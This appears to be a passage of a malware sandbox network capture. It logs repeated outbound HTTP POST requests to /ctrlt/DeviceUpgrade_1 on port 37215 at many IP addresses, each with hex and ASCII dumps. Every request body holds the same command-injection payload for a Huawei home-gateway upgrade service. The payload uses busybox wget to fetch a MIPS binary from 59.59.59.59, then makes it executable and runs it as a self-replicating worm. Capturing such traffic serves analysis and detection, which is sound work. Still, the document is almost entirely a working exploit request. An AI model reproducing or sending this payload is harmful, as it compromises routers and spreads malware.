                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1513192.168.2.1559618157.188.235.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.881906033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1514192.168.2.155169041.236.78.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.881927013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1515192.168.2.1557048197.86.134.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.881938934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1516192.168.2.154586241.80.178.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.881975889 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1517192.168.2.1536212197.3.17.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.882005930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1518192.168.2.1548842197.185.66.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.882035971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1519192.168.2.155639041.213.2.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.882045984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1520192.168.2.1548556197.69.109.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.882076025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1521192.168.2.1555490157.43.65.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.893291950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1522192.168.2.1549680157.78.205.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899259090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
